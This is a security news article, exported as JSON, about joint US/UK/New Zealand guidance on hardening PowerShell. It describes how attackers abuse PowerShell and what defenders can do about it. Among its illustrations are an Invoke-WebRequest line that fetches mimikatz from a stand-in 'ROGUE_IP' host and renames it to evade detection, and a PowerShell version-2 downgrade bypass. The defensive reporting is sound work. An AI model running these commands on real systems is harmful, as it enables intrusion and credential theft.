{"id":22409,"date":"2022-06-24T16:44:06","date_gmt":"2022-06-24T16:44:06","guid":{"rendered":"https:\/\/www.esecurityplanet.com\/?p=22409"},"modified":"2022-06-24T16:44:08","modified_gmt":"2022-06-24T16:44:08","slug":"powershell-security","status":"publish","type":"post","link":"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/","title":{"rendered":"Cybersecurity Agencies Release Guidance for PowerShell Security"},"content":{"rendered":"\n

PowerShell is one of the most common tools<\/a> used by hackers in “living off the land” attacks, when malicious actors use an organization’s own tools against itself.<\/p>\n\n\n\n

This week, U.S. cybersecurity agencies joined their counterparts in the UK and New Zealand to offer guidance so organizations can use PowerShell safely.<\/p>\n\n\n\n

PowerShell is a command line tool and associated scripting language built on the .NET framework. Originally built for Windows, Microsoft open sourced<\/a> it in 2016. While most administrators use it to patch systems and execute scripts, PowerShell is also a classic tool in the hackers\u2019 arsenal, so defenders and pentesters<\/a> need to master it.<\/p>\n\n\n\n

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) announced<\/a> a joint Cybersecurity Information Sheet (CIS) between cybersecurity authorities from the U.S., New Zealand and the UK on PowerShell in the hope of helping defenders detect PowerShell abuses while enabling legitimate uses.<\/p>\n\n\n\n

CISA, the NSA and their UK and New Zealand counterparts are urging users and administrators to review the guidance, Keeping PowerShell: Measures to Use and Embrace<\/a>, an 8-page PDF document that lists concrete actions to mitigate attacks.<\/p>\n\n\n\n

See the Top Active Directory Security Tools<\/a><\/p>\n\n\n\n

How Attackers Use PowerShell<\/strong><\/h2>\n\n\n\n

Tactics vary, but hackers usually gain initial access (such as after a phishing attack<\/a>) and then use PowerShell to target Active Directory (AD) or other critical systems.<\/p>\n\n\n\n

If admins do not restrict AD attributes, methods and capabilities, hackers might steal credentials or elevate privileges to exfiltrate data or install malware<\/a>. On the other hand, if PowerShell is too limited or disabled, admins won\u2019t be able to \u201cassist with system maintenance, forensics, automation, and security,\u201d according to the guidance document.<\/p>\n\n\n\n

Pentesters can attempt various attacks using PowerShell, as the console accepts pretty much everything that works with cmd.exe, including old scripts and .bat files, but a common approach is to download resources from an external IP:<\/p>\n\n\n\n

Invoke-WebRequest “http:\/\/ROGUE_IP:80\/mimikatz.exe” -OutFile “legitimateexec.exe”<\/em><\/p>\n\n\n\n

Note: in the above command, \u201cmimikatz.exe\u201d does not become legitimate once written onto the system but is simply renamed to evade basic detection (which is unfortunately often enough).<\/p>\n\n\n\n

It\u2019s a very basic example but, in real-world conditions, hackers can hide malicious code using base64 or more sophisticated obfuscation.<\/p>\n\n\n\n

Of course, it\u2019s not the only attack possible. You can enumerate scheduled tasks, list members and administrators, get environment variables, read history, bypass policies, disable monitoring, inject malicious code in memory, and achieve more complex tasks.<\/p>\n\n\n\n

Also read: How Hackers Evade Detection<\/a><\/p>\n\n\n\n

How Users and Admins Can Secure PowerShell<\/strong><\/h2>\n\n\n\n

Some PowerShell attacks are pretty hard to detect. Defenders can use EDR tools<\/a> or other security products to mitigate them.<\/p>\n\n\n\n

Those PowerShell attacks are attractive for hackers because they can quickly elevate privileges in permissive environments. In other words, it\u2019s a legitimate tool that can give access to both local and remote systems across the network.<\/p>\n\n\n\n

Users and admins can strengthen their systems significantly by rejecting unsigned scripts and restricting script execution.<\/p>\n\n\n\n

According to the document, they should also disable and uninstall deprecated versions of PowerShell to reduce most abuses by attackers. Besides, recent versions have enhanced built-in security features for prevention, detection, and authentication capabilities, such as PowerShell’s credential protection features.<\/p>\n\n\n\n

Logging PowerShell activities is also recommended. For example, the Deep Script Block Logging (DSBL) module can allow you to record suspicious Invoke commands used by hackers during their attacks.<\/p>\n\n\n\n

If you need to run tasks remotely, use SSH, as it\u2019s secure by design, unlike some protocols.<\/p>\n\n\n\n

The screenshot below lists features included in recent versions of PowerShell that security teams and defenders can use:
<\/p>\n\n\n\n

Be Aware of Common Bypass Techniques<\/strong><\/h2>\n\n\n\n

You can read the PowerShell execution policy by typing:<\/p>\n\n\n\n

Get-ExecutionPolicy<\/em><\/p>\n\n\n\n

It\u2019s meant to restrict what can run and what cannot, which is especially recommended to block scripts downloaded from the Internet, but there are known techniques to bypass restrictions, modify the execution policy to elevate privileges, and even disable it if needed.<\/p>\n\n\n\n

You can use a command like the following to modify the policy:<\/p>\n\n\n\n

Set-ExecutionPolicy $Policy -Force<\/em><\/p>\n\n\n\n

The problem is the above command can be executed by a legitimate user to complete administrative tasks, so you can\u2019t disable it without inconvenience. Not all users should be allowed to run it, for obvious reasons. Behavioral analysis<\/a> might help spot such unusual activities in user accounts.<\/p>\n\n\n\n

Also, don\u2019t use PowerShell security features blindly. For example, AMSI (Anti-Malware Scan Interface) is a PowerShell security feature that allows integration into anti-malware products, but it\u2019s instrumented by a dll (amsi.dll) that can be abused.<\/p>\n\n\n\n

Besides, attackers have learned how security features work and how to evade them. The PowerShell downgrade attack is a common bypass that is used to remove security features:<\/p>\n\n\n\n

PowerShell -Version 2<\/em><\/p>\n\n\n\n

Hackers can even use an automated tool such as Unicorn<\/a> to perform these attacks.<\/p>\n\n\n\n

Also read: A Few Clicks from Data Disaster: The State of Enterprise Security<\/a><\/p>\n\n\n\n

No Foolproof Solution<\/strong><\/h2>\n\n\n\n

As usual, there\u2019s no magic solution. Using the latest versions of PowerShell and restricting the execution policy won\u2019t block the most sophisticated attacks that can divert native functionalities and remain undetected.<\/p>\n\n\n\n

However, that’s still a significant step towards better security, as lots of corporate networks neglect post-exploitation, making AD enumeration and other abuses relatively easy for hackers. Defense in layers is efficient and there\u2019s no valid reason not to harden your configurations.<\/p>\n\n\n\n

Read next: Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR<\/a><\/p>\n\n\n

\n \n\n \n\n
\n \n <\/path>\n <\/svg>\n <\/div>\n \n
\n
\n

\n Get the Free Cybersecurity Newsletter <\/h3>\n \n \n

\n Strengthen your organization's IT security defenses by keeping up to date on the latest cybersecurity news, solutions, and best practices. Delivered every Monday, Tuesday and Thursday <\/p>\n <\/div>\n\n

\n
\n \n Email Address\n <\/label>\n \n <\/div>\n\n
\n
\n \n \n By signing up to receive our newsletter, you agree to our Terms of Use and Privacy Policy. You can unsubscribe at any time. <\/label>\n <\/div>\n <\/div>\n \n